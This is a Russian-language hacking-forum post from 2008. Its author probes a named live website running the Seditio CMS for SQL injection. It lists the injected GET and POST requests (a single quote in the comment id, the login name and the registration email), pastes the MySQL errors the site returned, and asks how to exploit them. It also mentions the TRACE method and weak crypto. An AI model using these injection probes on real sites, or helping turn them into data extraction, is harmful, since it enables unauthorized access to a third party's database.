Seditio Remote Blind SQL Injection

24.04.2008, 10:06

Neoclub

Новичок

Регистрация: 12.04.2008

Сообщений: 2

Провел на форуме:
7942

Репутация: 5

Оффсайт работает http://www.neocrome.ru/ анлг соответственно .net

На сайте sumclub.ru который работает на движке Seditio обнаружел сдедующие уязвимости

Запрос для выполнения SQL инъекции:
http://sumclub.ru/forum/comments.php?id=1'

Результат работы

<...>
pfOjA6XzpzdW1jbHViX25ldw%3D%3D; expires=Fri, 19-Jun-2037 18:54:00 GMT

MySQL error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1\' ORDER BY com_id ASC' at line 1
<...>

Запрос для выполнения SQL инъекции:

POST /forum/auth.php?m=login&a=check&redirect= HTTP/1.1
Host: sumclub.ru
Content-Type: application/x-www-form-urlencoded
Content-Length: 40

rusername='&rpassword=1&rcookiettl=1&x=1

Результат работы

<...>
A6XzpzdW1jbHViX25ldw%3D%3D; expires=Fri, 19-Jun-2037 19:36:09 GMT

a3
MySQL error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\'' at line 1
0

Запрос для выполнения SQL инъекции:

POST /forum/auth.php?m=register&a=add HTTP/1.1
Host: sumclub.ru
Content-Type: application/x-www-form-urlencoded
Content-Length: 87

rusername=1&remail='&rpassword1=1&rpassword2=1&rlo cation=1&roccupation=1&x=1&rcountry=1

Результат работы

<...>
A6XzpzdW1jbHViX25ldw%3D%3D; expires=Fri, 19-Jun-2037 19:55:15 GMT

a3
MySQL error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\'' at line 1
0

что можно с этм зделать

помино обнаружено

Доступен метод TRACE

Слабая криптография
Версии протокола 1.33 и 1.5 недостаточно защищены криптографически.

Последний раз редактировалось Neoclub; 24.04.2008 в 10:11..

ANTICHAT — форум по информационной безопасности, OSINT и технологиям